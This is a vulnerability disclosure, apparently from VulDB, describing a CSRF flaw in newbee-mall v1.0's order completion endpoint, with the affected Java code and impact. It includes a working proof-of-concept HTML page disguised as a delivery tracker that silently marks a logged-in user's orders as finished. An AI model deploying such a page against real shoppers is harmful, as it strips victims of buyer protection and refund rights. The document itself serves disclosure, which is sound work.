| Field | Value |
|---|---|
| Title | newbee-ltd newbee-mall v1.0 CSRF |

**Description**:

# CSRF Vulnerability in Order Completion
## Summary
A **CSRF vulnerability** exists in the order completion endpoint `/orders/{orderNo}/finish`. An attacker can make a logged-in user's browser mark orders as completed before the goods are received, which releases the payment and makes refund claims difficult.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/orders/**");
        // ❌ No CSRF protection mechanism
    }
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 97-107)
```java
@PutMapping("/orders/{orderNo}/finish")
@ResponseBody
public Result finishOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Completes order without verification of actual delivery
    String finishOrderResult = newBeeMallOrderService.finishOrder(orderNo, user.getUserId());
    if (ServiceResultEnum.SUCCESS.getResult().equals(finishOrderResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(finishOrderResult);
    }
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ No additional confirmation required for order completion
3. ⚠️ Premature completion releases payment to merchant
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
  <title>Order Tracking System</title>
</head>
<body>
  <h2>Tracking Your Delivery</h2>
  <p>Updating delivery status...</p>
  <script>
    // Finish multiple recent orders
    var orderNumbers = [
      '202602051645001',
      '202602051645002',
      '202602051645003'
    ];
    orderNumbers.forEach(function(orderNo) {
      fetch('http://localhost:28089/orders/' + orderNo + '/finish', {
        method: 'PUT',
        credentials: 'include'
      })
      .then(response => response.json())
      .then(data => console.log('Order ' + orderNo + ' completed'));
    });
    setTimeout(function() {
      document.body.innerHTML = '<h3>✅ Delivery status updated successfully!</h3>';
    }, 2000);
  </script>
</body>
</html>
```
## Impact
**Premature order completion and payment release**: users lose buyer protection and face difficulty obtaining refunds if goods are not received or are defective.
---
**CVSS Score**: 7.4 (High)

| Field | Value |
|---|---|
| Source | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/109 |
| User | flashzyc (UID 92850) |
| Submitted | 05/02/2026 11:52 (4 months ago) |
| Moderated | 18/02/2026 07:55 (13 days later) |
| Status | Duplicate |
| VulDB Entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Cross-Site Request Forgery] |
| Points | 0 |